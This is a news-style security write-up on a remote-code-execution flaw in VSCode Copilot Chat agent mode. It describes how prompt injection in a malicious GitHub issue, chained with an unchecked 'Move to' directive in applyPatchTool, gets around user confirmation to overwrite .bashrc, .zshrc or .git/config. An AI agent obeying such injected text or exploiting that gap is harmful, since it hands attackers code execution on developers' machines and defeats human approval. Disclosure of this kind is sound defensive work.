Critical RCE Vulnerability Discovered in VSCode Copilot Chat Agent Mode
Key Takeaways
- ▸VSCode Copilot Chat agent mode is vulnerable to prompt injection + TOCTOU attack chain allowing RCE
- ▸The applyPatchTool checks source file paths for security but fails to validate destination paths in 'Move to' directives
- ▸Attackers can bypass user confirmation mechanisms to write arbitrary files and achieve code execution
Summary
Security researchers have discovered a critical remote code execution (RCE) vulnerability in Microsoft VSCode's Copilot Chat agent mode. The vulnerability chains a prompt injection attack with a Time-of-check to time-of-use (TOCTOU) flaw in the applyPatchTool component, allowing attackers to bypass user confirmation mechanisms and write arbitrary files to a developer's system.
The attack begins when a repository maintainer uses VSCode's "code with agent mode" feature on a malicious issue. The Copilot agent automatically processes the issue description, which can contain crafted prompts designed to trigger code modifications. While VSCode previously added confirmation dialogs for sensitive file operations, researchers found that the applyPatchTool's user confirmation only validates source file paths from "Update File" directives, completely overlooking the "Move to" directive that specifies the destination path.
By exploiting this gap, an attacker can craft a patch that passes the security check but then uses the unchecked "Move to" directive to rename and write files to sensitive locations. The vulnerability can be weaponized to overwrite shell configuration files (.bashrc, .zshrc) or .git/config, achieving remote code execution with the privileges of the affected developer.
The vulnerability demonstrates how TOCTOU flaws can undermine AI agent safety mechanisms, particularly when multiple components handle different aspects of security validation without proper coordination. This case highlights the importance of comprehensive input validation in agent-based systems where untrusted content (like GitHub issues) can directly trigger tool invocations.
- Vulnerability affects developers who use 'code with agent mode' on potentially malicious repositories or issues
Editorial Opinion
This vulnerability exposes a critical gap in how AI agent safety mechanisms are implemented. Even when individual security controls (user confirmation dialogs) exist, they can be rendered ineffective by incomplete validation logic that doesn't account for all code paths and directives. As AI agents gain more autonomy in developer tools, ensuring airtight input validation and comprehensive security checks across all operations becomes essential—not optional.



